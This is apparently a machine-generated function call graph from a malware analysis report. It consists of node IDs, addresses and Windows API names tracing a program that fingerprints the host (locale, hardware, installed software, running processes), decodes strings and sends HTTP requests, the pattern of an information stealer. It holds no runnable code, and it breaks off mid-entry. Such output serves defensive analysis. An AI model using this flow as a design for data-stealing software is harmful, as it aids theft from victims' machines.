RtlAllocateHeap 14452 747628 wsprintfA 14450->14452 14453 747619 14450->14453 14451->14450 14455 74a740 lstrcpy 14452->14455 14454 74a740 lstrcpy 14453->14454 14456 745da7 14454->14456 14455->14456 14456->13520 14458 74a7a0 lstrcpy 14457->14458 14459 734899 14458->14459 15512 7347b0 14459->15512 14461 7348a5 14462 74a740 lstrcpy 14461->14462 14463 7348d7 14462->14463 14464 74a740 lstrcpy 14463->14464 14465 7348e4 14464->14465 14466 74a740 lstrcpy 14465->14466 14467 7348f1 14466->14467 14468 74a740 lstrcpy 14467->14468 14469 7348fe 14468->14469 14470 74a740 lstrcpy 14469->14470 14471 73490b InternetOpenA StrCmpCA 14470->14471 14472 734944 14471->14472 14473 734955 14472->14473 14474 734ecb InternetCloseHandle 14472->14474 15523 748b60 14473->15523 14476 734ee8 14474->14476 15518 739ac0 CryptStringToBinaryA 14476->15518 14477 734963 15531 74a920 14477->15531 14481 734976 14482 74a8a0 lstrcpy 14481->14482 14486 73497f 14482->14486 14483 74a820 2 API calls 14484 734f05 14483->14484 14485 74a9b0 4 API calls 14484->14485 14487 734f1b 14485->14487 14491 74a9b0 4 API calls 14486->14491 14489 74a8a0 lstrcpy 14487->14489 14488 734f27 ctype 14490 74a7a0 lstrcpy 14488->14490 14489->14488 14503 734f57 14490->14503 14492 7349a9 14491->14492 14493 74a8a0 lstrcpy 14492->14493 14494 7349b2 14493->14494 14495 74a9b0 4 API calls 14494->14495 14496 7349d1 14495->14496 14497 74a8a0 lstrcpy 14496->14497 14498 7349da 14497->14498 14499 74a920 3 API calls 14498->14499 14500 7349f8 14499->14500 14501 74a8a0 lstrcpy 14500->14501 14502 734a01 14501->14502 14504 74a9b0 4 API calls 14502->14504 14503->13523 14505 734a20 14504->14505 14506 74a8a0 lstrcpy 14505->14506 14507 734a29 14506->14507 14508 74a9b0 4 API calls 14507->14508 14509 734a48 14508->14509 14510 74a8a0 lstrcpy 14509->14510 14511 734a51 14510->14511 14512 74a9b0 4 API calls 14511->14512 14513 734a7d 14512->14513 14514 74a920 3 API calls 14513->14514 14515 734a84 14514->14515 14516 74a8a0 lstrcpy 14515->14516 14517 734a8d 14516->14517 14518 734aa3 InternetConnectA 14517->14518 14518->14474 14519 734ad3 HttpOpenRequestA 14518->14519 14521 734b28 14519->14521 14522 734ebe InternetCloseHandle 14519->14522 14523 74a9b0 4 API calls 14521->14523 14522->14474 14524 734b3c 14523->14524 14525 74a8a0 lstrcpy 14524->14525 14526 734b45 14525->14526 14527 74a920 3 API calls 14526->14527 14528 734b63 14527->14528 14529 74a8a0 lstrcpy 14528->14529 14530 734b6c 14529->14530 14531 74a9b0 4 API calls 14530->14531 14532 734b8b 14531->14532 14533 74a8a0 lstrcpy 14532->14533 14534 734b94 14533->14534 14535 74a9b0 4 API calls 14534->14535 14536 734bb5 14535->14536 14537 74a8a0 lstrcpy 14536->14537 14538 734bbe 14537->14538 14539 74a9b0 4 API calls 14538->14539 14540 734bde 14539->14540 14541 74a8a0 lstrcpy 14540->14541 14542 734be7 14541->14542 14543 74a9b0 4 API calls 14542->14543 14544 734c06 14543->14544 14545 74a8a0 lstrcpy 14544->14545 14546 734c0f 14545->14546 14547 74a920 3 API calls 14546->14547 14548 734c2d 14547->14548 14549 74a8a0 lstrcpy 14548->14549 14550 734c36 14549->14550 14551 74a9b0 4 API calls 14550->14551 14552 734c55 14551->14552 14553 74a8a0 lstrcpy 14552->14553 14554 734c5e 14553->14554 14555 74a9b0 4 API calls 14554->14555 14556 734c7d 14555->14556 14557 74a8a0 lstrcpy 14556->14557 14558 734c86 14557->14558 14559 74a920 3 API calls 14558->14559 14560 734ca4 14559->14560 14561 74a8a0 lstrcpy 14560->14561 14562 734cad 14561->14562 14563 74a9b0 4 API calls 14562->14563 14564 734ccc 14563->14564 14565 74a8a0 lstrcpy 14564->14565 14566 734cd5 14565->14566 14567 74a9b0 4 API calls 14566->14567 14568 734cf6 14567->14568 14569 74a8a0 lstrcpy 14568->14569 14570 734cff 14569->14570 14571 74a9b0 4 API calls 14570->14571 14572 734d1f 14571->14572 14573 74a8a0 lstrcpy 14572->14573 14574 734d28 14573->14574 14575 74a9b0 4 API calls 14574->14575 14576 734d47 14575->14576 14577 74a8a0 lstrcpy 14576->14577 14578 734d50 14577->14578 14579 74a920 3 API calls 14578->14579 14580 734d6e 14579->14580 14581 74a8a0 lstrcpy 14580->14581 14582 734d77 14581->14582 14583 74a740 lstrcpy 14582->14583 14584 734d92 14583->14584 14585 74a920 3 API calls 14584->14585 14586 734db3 14585->14586 14587 74a920 3 API calls 14586->14587 14588 734dba 14587->14588 14589 74a8a0 lstrcpy 14588->14589 14590 734dc6 14589->14590 14591 734de7 lstrlen 14590->14591 14592 734dfa 14591->14592 14593 734e03 lstrlen 14592->14593 15537 74aad0 14593->15537 14595 734e13 HttpSendRequestA 14596 734e32 InternetReadFile 14595->14596 14597 734e67 InternetCloseHandle 14596->14597 14602 734e5e 14596->14602 14600 74a800 14597->14600 14599 74a9b0 4 API calls 14599->14602 14600->14522 14601 74a8a0 lstrcpy 14601->14602 14602->14596 14602->14597 14602->14599 14602->14601 15539 74aad0 14603->15539 14605 7417c4 StrCmpCA 14606 7417cf ExitProcess 14605->14606 14608 7417d7 14605->14608 14607 7419c2 14607->13525 14608->14607 14609 741970 StrCmpCA 14608->14609 14610 7418f1 StrCmpCA 14608->14610 14611 741951 StrCmpCA 14608->14611 14612 741932 StrCmpCA 14608->14612 14613 741913 StrCmpCA 14608->14613 14614 74185d StrCmpCA 14608->14614 14615 74187f StrCmpCA 14608->14615 14616 7418ad StrCmpCA 14608->14616 14617 7418cf StrCmpCA 14608->14617 14618 74a820 lstrlen lstrcpy 14608->14618 14609->14608 14610->14608 14611->14608 14612->14608 14613->14608 14614->14608 14615->14608 14616->14608 14617->14608 14618->14608 14620 74a7a0 lstrcpy 14619->14620 14621 735979 14620->14621 14622 7347b0 2 API calls 14621->14622 14623 735985 14622->14623 14624 74a740 lstrcpy 14623->14624 14625 7359ba 14624->14625 14626 74a740 lstrcpy 14625->14626 14627 7359c7 14626->14627 14628 74a740 lstrcpy 14627->14628 14629 7359d4 14628->14629 14630 74a740 lstrcpy 14629->14630 14631 7359e1 14630->14631 14632 74a740 lstrcpy 14631->14632 14633 7359ee InternetOpenA StrCmpCA 14632->14633 14634 735a1d 14633->14634 14635 735fc3 InternetCloseHandle 14634->14635 14637 748b60 3 API calls 14634->14637 14636 735fe0 14635->14636 14639 739ac0 4 API calls 14636->14639 14638 735a3c 14637->14638 14640 74a920 3 API calls 14638->14640 14641 735fe6 14639->14641 14642 735a4f 14640->14642 14644 74a820 2 API calls 14641->14644 14647 73601f ctype 14641->14647 14643 74a8a0 lstrcpy 14642->14643 14648 735a58 14643->14648 14645 735ffd 14644->14645 14646 74a9b0 4 API calls 14645->14646 14649 736013 14646->14649 14650 74a7a0 lstrcpy 14647->14650 14652 74a9b0 4 API calls 14648->14652 14651 74a8a0 lstrcpy 14649->14651 14661 73604f 14650->14661 14651->14647 14653 735a82 14652->14653 14654 74a8a0 lstrcpy 14653->14654 14655 735a8b 14654->14655 14656 74a9b0 4 API calls 14655->14656 14657 735aaa 14656->14657 14658 74a8a0 lstrcpy 14657->14658 14659 735ab3 14658->14659 14660 74a920 3 API calls 14659->14660 14662 735ad1 14660->14662 14661->13531 14663 74a8a0 lstrcpy 14662->14663 14664 735ada 14663->14664 14665 74a9b0 4 API calls 14664->14665 14666 735af9 14665->14666 14667 74a8a0 lstrcpy 14666->14667 14668 735b02 14667->14668 14669 74a9b0 4 API calls 14668->14669 14670 735b21 14669->14670 14671 74a8a0 lstrcpy 14670->14671 14672 735b2a 14671->14672 14673 74a9b0 4 API calls 14672->14673 14674 735b56 14673->14674 14675 74a920 3 API calls 14674->14675 14676 735b5d 14675->14676 14677 74a8a0 lstrcpy 14676->14677 14678 735b66 14677->14678 14679 735b7c InternetConnectA 14678->14679 14679->14635 14680 735bac HttpOpenRequestA 14679->14680 14682 735fb6 InternetCloseHandle 14680->14682 14683 735c0b 14680->14683 14682->14635 14684 74a9b0 4 API calls 14683->14684 14685 735c1f 14684->14685 14686 74a8a0 lstrcpy 14685->14686 14687 735c28 14686->14687 14688 74a920 3 API calls 14687->14688 14689 735c46 14688->14689 14690 74a8a0 lstrcpy 14689->14690 14691 735c4f 14690->14691 14692 74a9b0 4 API calls 14691->14692 14693 735c6e 14692->14693 14694 74a8a0 lstrcpy 14693->14694 14695 735c77 14694->14695 14696 74a9b0 4 API calls 14695->14696 14697 735c98 14696->14697 14698 74a8a0 lstrcpy 14697->14698 14699 735ca1 14698->14699 14700 74a9b0 4 API calls 14699->14700 14701 735cc1 14700->14701 14702 74a8a0 lstrcpy 14701->14702 14703 735cca 14702->14703 14704 74a9b0 4 API calls 14703->14704 14705 735ce9 14704->14705 14706 74a8a0 lstrcpy 14705->14706 14707 735cf2 14706->14707 14708 74a920 3 API calls 14707->14708 14709 735d10 14708->14709 14710 74a8a0 lstrcpy 14709->14710 14711 735d19 14710->14711 14712 74a9b0 4 API calls 14711->14712 14713 735d38 14712->14713 14714 74a8a0 lstrcpy 14713->14714 14715 735d41 14714->14715 14716 74a9b0 4 API calls 14715->14716 14717 735d60 14716->14717 14718 74a8a0 lstrcpy 14717->14718 14719 735d69 14718->14719 14720 74a920 3 API calls 14719->14720 14721 735d87 14720->14721 14722 74a8a0 lstrcpy 14721->14722 14723 735d90 14722->14723 14724 74a9b0 4 API calls 14723->14724 14725 735daf 14724->14725 14726 74a8a0 lstrcpy 14725->14726 14727 735db8 14726->14727 14728 74a9b0 4 API calls 14727->14728 14729 735dd9 14728->14729 14730 74a8a0 lstrcpy 14729->14730 14731 735de2 14730->14731 14732 74a9b0 4 API calls 14731->14732 14733 735e02 14732->14733 14734 74a8a0 lstrcpy 14733->14734 14735 735e0b 14734->14735 14736 74a9b0 4 API calls 14735->14736 14737 735e2a 14736->14737 14738 74a8a0 lstrcpy 14737->14738 14739 735e33 14738->14739 14740 74a920 3 API calls 14739->14740 14741 735e54 14740->14741 14742 74a8a0 lstrcpy 14741->14742 14743 735e5d 14742->14743 14744 735e70 lstrlen 14743->14744 15540 74aad0 14744->15540 14746 735e81 lstrlen GetProcessHeap RtlAllocateHeap 15541 74aad0 14746->15541 14748 735eae lstrlen 14749 735ebe 14748->14749 14750 735ed7 lstrlen 14749->14750 14751 735ee7 14750->14751 14752 735ef0 lstrlen 14751->14752 14753 735f04 14752->14753 14754 735f1a lstrlen 14753->14754 15542 74aad0 14754->15542 14756 735f2a HttpSendRequestA 14757 735f35 InternetReadFile 14756->14757 14758 735f6a InternetCloseHandle 14757->14758 14762 735f61 14757->14762 14758->14682 14760 74a9b0 4 API calls 14760->14762 14761 74a8a0 lstrcpy 14761->14762 14762->14757 14762->14758 14762->14760 14762->14761 14765 741077 14763->14765 14764 741151 14764->13533 14765->14764 14766 74a820 lstrlen lstrcpy 14765->14766 14766->14765 14772 740db7 14767->14772 14768 740f17 14768->13541 14769 740ea4 StrCmpCA 14769->14772 14770 740e27 StrCmpCA 14770->14772 14771 740e67 StrCmpCA 14771->14772 14772->14768 14772->14769 14772->14770 14772->14771 14773 74a820 lstrlen lstrcpy 14772->14773 14773->14772 14775 740f67 14774->14775 14776 740fb2 StrCmpCA 14775->14776 14777 741044 14775->14777 14778 74a820 lstrlen lstrcpy 14775->14778 14776->14775 14777->13549 14778->14775 14780 74a740 lstrcpy 14779->14780 14781 741a26 14780->14781 14782 74a9b0 4 API calls 14781->14782 14783 741a37 14782->14783 14784 74a8a0 lstrcpy 14783->14784 14785 741a40 14784->14785 14786 74a9b0 4 API calls 14785->14786 14787 741a5b 14786->14787 14788 74a8a0 lstrcpy 14787->14788 14789 741a64 14788->14789 14790 74a9b0 4 API calls 14789->14790 14791 741a7d 14790->14791 14792 74a8a0 lstrcpy 14791->14792 14793 741a86 14792->14793 14794 74a9b0 4 API calls 14793->14794 14795 741aa1 14794->14795 14796 74a8a0 lstrcpy 14795->14796 14797 741aaa 14796->14797 14798 74a9b0 4 API calls 14797->14798 14799 741ac3 14798->14799 14800 74a8a0 lstrcpy 14799->14800 14801 741acc 14800->14801 14802 74a9b0 4 API calls 14801->14802 14803 741ae7 14802->14803 14804 74a8a0 lstrcpy 14803->14804 14805 741af0 14804->14805 14806 74a9b0 4 API calls 14805->14806 14807 741b09 14806->14807 14808 74a8a0 lstrcpy 14807->14808 14809 741b12 14808->14809 14810 74a9b0 4 API calls 14809->14810 14811 741b2d 14810->14811 14812 74a8a0 lstrcpy 14811->14812 14813 741b36 14812->14813 14814 74a9b0 4 API calls 14813->14814 14815 741b4f 14814->14815 14816 74a8a0 lstrcpy 14815->14816 14817 741b58 14816->14817 14818 74a9b0 4 API calls 14817->14818 14819 741b76 14818->14819 14820 74a8a0 lstrcpy 14819->14820 14821 741b7f 14820->14821 14822 747500 6 API calls 14821->14822 14823 741b96 14822->14823 14824 74a920 3 API calls 14823->14824 14825 741ba9 14824->14825 14826 74a8a0 lstrcpy 14825->14826 14827 741bb2 14826->14827 14828 74a9b0 4 API calls 14827->14828 14829 741bdc 14828->14829 14830 74a8a0 lstrcpy 14829->14830 14831 741be5 14830->14831 14832 74a9b0 4 API calls 14831->14832 14833 741c05 14832->14833 14834 74a8a0 lstrcpy 14833->14834 14835 741c0e 14834->14835 15543 747690 GetProcessHeap RtlAllocateHeap 14835->15543 14838 74a9b0 4 API calls 14839 741c2e 14838->14839 14840 74a8a0 lstrcpy 14839->14840 14841 741c37 14840->14841 14842 74a9b0 4 API calls 14841->14842 14843 741c56 14842->14843 14844 74a8a0 lstrcpy 14843->14844 14845 741c5f 14844->14845 14846 74a9b0 4 API calls 14845->14846 14847 741c80 14846->14847 14848 74a8a0 lstrcpy 14847->14848 14849 741c89 14848->14849 15550 7477c0 GetCurrentProcess IsWow64Process 14849->15550 14852 74a9b0 4 API calls 14853 741ca9 14852->14853 14854 74a8a0 lstrcpy 14853->14854 14855 741cb2 14854->14855 14856 74a9b0 4 API calls 14855->14856 14857 741cd1 14856->14857 14858 74a8a0 lstrcpy 14857->14858 14859 741cda 14858->14859 14860 74a9b0 4 API calls 14859->14860 14861 741cfb 14860->14861 14862 74a8a0 lstrcpy 14861->14862 14863 741d04 14862->14863 14864 747850 3 API calls 14863->14864 14865 741d14 14864->14865 14866 74a9b0 4 API calls 14865->14866 14867 741d24 14866->14867 14868 74a8a0 lstrcpy 14867->14868 14869 741d2d 14868->14869 14870 74a9b0 4 API calls 14869->14870 14871 741d4c 14870->14871 14872 74a8a0 lstrcpy 14871->14872 14873 741d55 14872->14873 14874 74a9b0 4 API calls 14873->14874 14875 741d75 14874->14875 14876 74a8a0 lstrcpy 14875->14876 14877 741d7e 14876->14877 14878 7478e0 3 API calls 14877->14878 14879 741d8e 14878->14879 14880 74a9b0 4 API calls 14879->14880 14881 741d9e 14880->14881 14882 74a8a0 lstrcpy 14881->14882 14883 741da7 14882->14883 14884 74a9b0 4 API calls 14883->14884 14885 741dc6 14884->14885 14886 74a8a0 lstrcpy 14885->14886 14887 741dcf 14886->14887 14888 74a9b0 4 API calls 14887->14888 14889 741df0 14888->14889 14890 74a8a0 lstrcpy 14889->14890 14891 741df9 14890->14891 15552 747980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14891->15552 14894 74a9b0 4 API calls 14895 741e19 14894->14895 14896 74a8a0 lstrcpy 14895->14896 14897 741e22 14896->14897 14898 74a9b0 4 API calls 14897->14898 14899 741e41 14898->14899 14900 74a8a0 lstrcpy 14899->14900 14901 741e4a 14900->14901 14902 74a9b0 4 API calls 14901->14902 14903 741e6b 14902->14903 14904 74a8a0 lstrcpy 14903->14904 14905 741e74 14904->14905 15554 747a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14905->15554 14908 74a9b0 4 API calls 14909 741e94 14908->14909 14910 74a8a0 lstrcpy 14909->14910 14911 741e9d 14910->14911 14912 74a9b0 4 API calls 14911->14912 14913 741ebc 14912->14913 14914 74a8a0 lstrcpy 14913->14914 14915 741ec5 14914->14915 14916 74a9b0 4 API calls 14915->14916 14917 741ee5 14916->14917 14918 74a8a0 lstrcpy 14917->14918 14919 741eee 14918->14919 15557 747b00 GetUserDefaultLocaleName 14919->15557 14922 74a9b0 4 API calls 14923 741f0e 14922->14923 14924 74a8a0 lstrcpy 14923->14924 14925 741f17 14924->14925 14926 74a9b0 4 API calls 14925->14926 14927 741f36 14926->14927 14928 74a8a0 lstrcpy 14927->14928 14929 741f3f 14928->14929 14930 74a9b0 4 API calls 14929->14930 14931 741f60 14930->14931 14932 74a8a0 lstrcpy 14931->14932 14933 741f69 14932->14933 15561 747b90 14933->15561 14935 741f80 14936 74a920 3 API calls 14935->14936 14937 741f93 14936->14937 14938 74a8a0 lstrcpy 14937->14938 14939 741f9c 14938->14939 14940 74a9b0 4 API calls 14939->14940 14941 741fc6 14940->14941 14942 74a8a0 lstrcpy 14941->14942 14943 741fcf 14942->14943 14944 74a9b0 4 API calls 14943->14944 14945 741fef 14944->14945 14946 74a8a0 lstrcpy 14945->14946 14947 741ff8 14946->14947 15573 747d80 GetSystemPowerStatus 14947->15573 14950 74a9b0 4 API calls 14951 742018 14950->14951 14952 74a8a0 lstrcpy 14951->14952 14953 742021 14952->14953 14954 74a9b0 4 API calls 14953->14954 14955 742040 14954->14955 14956 74a8a0 lstrcpy 14955->14956 14957 742049 14956->14957 14958 74a9b0 4 API calls 14957->14958 14959 74206a 14958->14959 14960 74a8a0 lstrcpy 14959->14960 14961 742073 14960->14961 14962 74207e GetCurrentProcessId 14961->14962 15575 749470 OpenProcess 14962->15575 14965 74a920 3 API calls 14966 7420a4 14965->14966 14967 74a8a0 lstrcpy 14966->14967 14968 7420ad 14967->14968 14969 74a9b0 4 API calls 14968->14969 14970 7420d7 14969->14970 14971 74a8a0 lstrcpy 14970->14971 14972 7420e0 14971->14972 14973 74a9b0 4 API calls 14972->14973 14974 742100 14973->14974 14975 74a8a0 lstrcpy 14974->14975 14976 742109 14975->14976 15580 747e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14976->15580 14979 74a9b0 4 API calls 14980 742129 14979->14980 14981 74a8a0 lstrcpy 14980->14981 14982 742132 14981->14982 14983 74a9b0 4 API calls 14982->14983 14984 742151 14983->14984 14985 74a8a0 lstrcpy 14984->14985 14986 74215a 14985->14986 14987 74a9b0 4 API calls 14986->14987 14988 74217b 14987->14988 14989 74a8a0 lstrcpy 14988->14989 14990 742184 14989->14990 15584 747f60 14990->15584 14993 74a9b0 4 API calls 14994 7421a4 14993->14994 14995 74a8a0 lstrcpy 14994->14995 14996 7421ad 14995->14996 14997 74a9b0 4 API calls 14996->14997 14998 7421cc 14997->14998 14999 74a8a0 lstrcpy 14998->14999 15000 7421d5 14999->15000 15001 74a9b0 4 API calls 15000->15001 15002 7421f6 15001->15002 15003 74a8a0 lstrcpy 15002->15003 15004 7421ff 15003->15004 15597 747ed0 GetSystemInfo wsprintfA 15004->15597 15007 74a9b0 4 API calls 15008 74221f 15007->15008 15009 74a8a0 lstrcpy 15008->15009 15010 742228 15009->15010 15011 74a9b0 4 API calls 15010->15011 15012 742247 15011->15012 15013 74a8a0 lstrcpy 15012->15013 15014 742250 15013->15014 15015 74a9b0 4 API calls 15014->15015 15016 742270 15015->15016 15017 74a8a0 lstrcpy 15016->15017 15018 742279 15017->15018 15599 748100 GetProcessHeap RtlAllocateHeap 15018->15599 15021 74a9b0 4 API calls 15022 742299 15021->15022 15023 74a8a0 lstrcpy 15022->15023 15024 7422a2 15023->15024 15025 74a9b0 4 API calls 15024->15025 15026 7422c1 15025->15026 15027 74a8a0 lstrcpy 15026->15027 15028 7422ca 15027->15028 15029 74a9b0 4 API calls 15028->15029 15030 7422eb 15029->15030 15031 74a8a0 lstrcpy 15030->15031 15032 7422f4 15031->15032 15605 7487c0 15032->15605 15035 74a920 3 API calls 15036 74231e 15035->15036 15037 74a8a0 lstrcpy 15036->15037 15038 742327 15037->15038 15039 74a9b0 4 API calls 15038->15039 15040 742351 15039->15040 15041 74a8a0 lstrcpy 15040->15041 15042 74235a 15041->15042 15043 74a9b0 4 API calls 15042->15043 15044 74237a 15043->15044 15045 74a8a0 lstrcpy 15044->15045 15046 742383 15045->15046 15047 74a9b0 4 API calls 15046->15047 15048 7423a2 15047->15048 15049 74a8a0 lstrcpy 15048->15049 15050 7423ab 15049->15050 15610 7481f0 15050->15610 15052 7423c2 15053 74a920 3 API calls 15052->15053 15054 7423d5 15053->15054 15055 74a8a0 lstrcpy 15054->15055 15056 7423de 15055->15056 15057 74a9b0 4 API calls 15056->15057 15058 74240a 15057->15058 15059 74a8a0 lstrcpy 15058->15059 15060 742413 15059->15060 15061 74a9b0 4 API calls 15060->15061 15062 742432 15061->15062 15063 74a8a0 lstrcpy 15062->15063 15064 74243b 15063->15064 15065 74a9b0 4 API calls 15064->15065 15066 74245c 15065->15066 15067 74a8a0 lstrcpy 15066->15067 15068 742465 15067->15068 15069 74a9b0 4 API calls 15068->15069 15070 742484 15069->15070 15071 74a8a0 lstrcpy 15070->15071 15072 74248d 15071->15072 15073 74a9b0 4 API calls 15072->15073 15074 7424ae 15073->15074 15075 74a8a0 lstrcpy 15074->15075 15076 7424b7 15075->15076 15618 748320 15076->15618 15078 7424d3 15079 74a920 3 API calls 15078->15079 15080 7424e6 15079->15080 15081 74a8a0 lstrcpy 15080->15081 15082 7424ef 15081->15082 15083 74a9b0 4 API calls 15082->15083 15084 742519 15083->15084 15085 74a8a0 lstrcpy 15084->15085 15086 742522 15085->15086 15087 74a9b0 4 API calls 15086->15087 15088 742543 15087->15088 15089 74a8a0 lstrcpy 15088->15089 15090 74254c 15089->15090 15091 748320 17 API calls 15090->15091 15092 742568 15091->15092 15093 74a920 3 API calls 15092->15093 15094 74257b 15093->15094 15095 74a8a0 lstrcpy 15094->15095 15096 742584 15095->15096 15097 74a9b0 4 API calls 15096->15097 15098 7425ae 15097->15098 15099 74a8a0 lstrcpy 15098->15099 15100 7425b7 15099->15100 15101 74a9b0 4 API calls 15100->15101 15102 7425d6 15101->15102 15103 74a8a0 lstrcpy 15102->15103 15104 7425df 15103->15104 15105 74a9b0 4 API calls 15104->15105 15106 742600 15105->15106 15107 74a8a0 lstrcpy 15106->15107 15108 742609 15107->15108 15654 748680 15108->15654 15110 742620 15111 74a920 3 API calls 15110->15111 15112 742633 15111->15112 15113 74a8a0 lstrcpy 15112->15113 15114 74263c 15113->15114 15115 74265a lstrlen 15114->15115 15116 74266a 15115->15116 15117 74a740 lstrcpy 15116->15117 15118 74267c 15117->15118 15119 731590 lstrcpy 15118->15119 15120 74268d 15119->15120 15664 745190 15120->15664 15122 742699 15122->13553 15852 74aad0 15123->15852 15125 735009 InternetOpenUrlA 15129 735021 15125->15129 15126 7350a0 InternetCloseHandle InternetCloseHandle 15128 7350ec 15126->15128 15127 73502a InternetReadFile 15127->15129 15128->13557 15129->15126 15129->15127 15853 7398d0 15130->15853 15132 740759 15133 74077d 15132->15133 15134 740a38 15132->15134 15137 740799 StrCmpCA 15133->15137 15135 731590 lstrcpy 15134->15135 15136 740a49 15135->15136 16029 740250 15136->16029 15139 7407a8 15137->15139 15165 740843 15137->15165 15140 74a7a0 lstrcpy 15139->15140 15142 7407c3 15140->15142 15141 740865 StrCmpCA 15144 740874 15141->15144 15182 74096b 15141->15182 15145 731590 lstrcpy 15142->15145 15146 74a740 lstrcpy 15144->15146 15147 74080c 15145->15147 15150 740881 15146->15150 15148 74a7a0 lstrcpy 15147->15148 15151 740823 15148->15151 15149 74099c StrCmpCA 15152 740a2d 15149->15152 15153 7409ab 15149->15153 15154 74a9b0 4 API calls 15150->15154 15155 74a7a0 lstrcpy 15151->15155 15152->13561 15156 731590 lstrcpy 15153->15156 15157 7408ac 15154->15157 15158 74083e 15155->15158 15159 7409f4 15156->15159 15160 74a920 3 API calls 15157->15160 15856 73fb00 15158->15856 15162 74a7a0 lstrcpy 15159->15162 15163 7408b3 15160->15163 15166 740a0d 15162->15166 15164 74a9b0 4 API calls 15163->15164 15167 7408ba 15164->15167 15165->15141 15168 74a7a0 lstrcpy 15166->15168 15169 740a28 15168->15169 15972 740030 15169->15972 15182->15149 15504 74a7a0 lstrcpy 15503->15504 15505 731683 15504->15505 15506 74a7a0 lstrcpy 15505->15506 15507 731695 15506->15507 15508 74a7a0 lstrcpy 15507->15508 15509 7316a7 15508->15509 15510 74a7a0 lstrcpy 15509->15510 15511 7315a3 15510->15511 15511->14384 15513 7347c6 15512->15513 15514 734838 lstrlen 15513->15514 15538 74aad0 15514->15538 15516 734848 InternetCrackUrlA 15517 734867 15516->15517 15517->14461 15519 734eee 15518->15519 15520 739af9 LocalAlloc 15518->15520 15519->14483 15519->14488 15520->15519 15521 739b14 CryptStringToBinaryA 15520->15521 15521->15519 15522 739b39 LocalFree 15521->15522 15522->15519 15524 74a740 lstrcpy 15523->15524 15525 748b74 15524->15525 15526 74a740 lstrcpy 15525->15526 15527 748b82 GetSystemTime 15526->15527 15528 748b99 15527->15528 15529 74a7a0 lstrcpy 15528->15529 15530 748bfc 15529->15530 15530->14477 15532 74a931 15531->15532 15533 74a988 15532->15533 15535 74a968 lstrcpy lstrcat 15532->15535 15534 74a7a0 lstrcpy 15533->15534 15536 74a994 15534->15536 15535->15533 15536->14481 15537->14595 15538->15516 15539->14605 15540->14746 15541->14748 15542->14756 15671 7477a0 15543->15671 15546 7476c6 RegOpenKeyExA 15548 747704 RegCloseKey 15546->15548 15549 7476e7 RegQueryValueExA 15546->15549 15547 741c1e 15547->14838 15548->15547 15549->15548 15551 741c99 15550->15551 15551->14852 15553 741e09 15552->15553 15553->14894 15555 741e84 15554->15555 15556 747a9a wsprintfA 15554->15556 15555->14908 15556->15555 15558 741efe 15557->15558 15559 747b4d 15557->15559 15558->14922 15678 748d20 LocalAlloc CharToOemW 15559->15678 15562 74a740 lstrcpy 15561->15562 15563 747bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15562->15563 15571 747c25 15563->15571 15564 747c46 GetLocaleInfoA 15564->15571 15565 747d18 15566 747d1e LocalFree 15565->15566 15567 747d28 15565->15567 15566->15567 15568 74a7a0 lstrcpy 15567->15568 15572 747d37 15568->15572 15569 74a9b0 lstrcpy lstrlen lstrcpy lstrcat 15569->15571 15570 74a8a0 lstrcpy 15570->15571 15571->15564 15571->15565 15571->15569 15571->15570 15572->14935 15574 742008 15573->15574 15574->14950 15576 7494b5 15575->15576 15577 749493 GetModuleFileNameExA CloseHandle 15575->15577 15578 74a740 lstrcpy 15576->15578 15577->15576 15579 742091 15578->15579 15579->14965 15581 742119 15580->15581 15582 747e68 RegQueryValueExA 15580->15582 15581->14979 15583 747e8e RegCloseKey 15582->15583 15583->15581 15585 747fb9 GetLogicalProcessorInformationEx 15584->15585 15586 747fd8 GetLastError 15585->15586 15589 748029 15585->15589 15593 747fe3 15586->15593 15596 748022 15586->15596 15590 7489f0 2 API calls 15589->15590 15592 74807b 15590->15592 15591 7489f0 2 API calls 15594 742194 15591->15594 15595 748084 wsprintfA 15592->15595 15592->15596 15593->15585 15593->15594 15679 7489f0 15593->15679 15682 748a10 GetProcessHeap RtlAllocateHeap 15593->15682 15594->14993 15595->15594 15596->15591 15596->15594 15598 74220f 15597->15598 15598->15007 15600 7489b0 15599->15600 15601 74814d GlobalMemoryStatusEx 15600->15601 15604 748163 __aulldiv 15601->15604 15602 74819b wsprintfA 15603 742289 15602->15603 15603->15021 15604->15602 15606 7487fb GetProcessHeap RtlAllocateHeap wsprintfA 15605->15606 15608 74a740 lstrcpy 15606->15608 15609 74230b 15608->15609 15609->15035 15611 74a740 lstrcpy 15610->15611 15617 748229 15611->15617 15612 748263 15613 74a7a0 lstrcpy 15612->15613 15615 7482dc 15613->15615 15614 74a9b0 lstrcpy lstrlen lstrcpy lstrcat 15614->15617 15615->15052 15616 74a8a0 lstrcpy 15616->15617 15617->15612 15617->15614 15617->15616 15619 74a740 lstrcpy 15618->15619 15620 74835c RegOpenKeyExA 15619->15620 15621 7483d0 15620->15621 15622 7483ae 15620->15622 15625 748613 RegCloseKey 15621->15625 15626 7483f8 RegEnumKeyExA 15621->15626 15623 74a7a0 lstrcpy 15622->15623 15624 7483bd 15623->15624 15624->15078 15627 74a7a0 lstrcpy 15625->15627 15628 74860e 15626->15628 15629 74843f wsprintfA RegOpenKeyExA 15626->15629 15627->15624 15628->15625 15630 748485 RegCloseKey RegCloseKey 15629->15630 15631 7484c1 RegQueryValueExA 15629->15631 15634 74a7a0 lstrcpy 15630->15634 15632 748601 RegCloseKey 15631->15632 15633 7484fa lstrlen 15631->15633 15632->15628 15633->15632 15635 748510 15633->15635 15634->15624 15636 74a9b0 4 API calls 15635->15636 15637 748527 15636->15637 15638 74a8a0 lstrcpy 15637->15638 15639 748533 15638->15639 15640 74a9b0 4 API calls 15639->15640 15641 748557 15640->15641 15642 74a8a0 lstrcpy 15641->15642 15643 748563 15642->15643 15644 74856e RegQueryValueExA 15643->15644 15644->15632 15645 7485a3 15644->15645 15646 74a9b0 4 API calls 15645->15646 15647 7485ba 15646->15647 15648 74a8a0 lstrcpy 15647->15648 15649 7485c6 15648->15649 15650 74a9b0 4 API calls 15649->15650 15651 7485ea 15650->15651 15652 74a8a0 lstrcpy 15651->15652 15653 7485f6 15652->15653 15653->15632 15655 74a740 lstrcpy 15654->15655 15656 7486bc CreateToolhelp32Snapshot Process32First 15655->15656 15657 74875d CloseHandle 15656->15657 15658 7486e8 Process32Next 15656->15658 15659 74a7a0 lstrcpy 15657->15659 15658->15657 15660 7486fd 15658->15660 15661 748776 15659->15661 15660->15658 15662 74a9b0 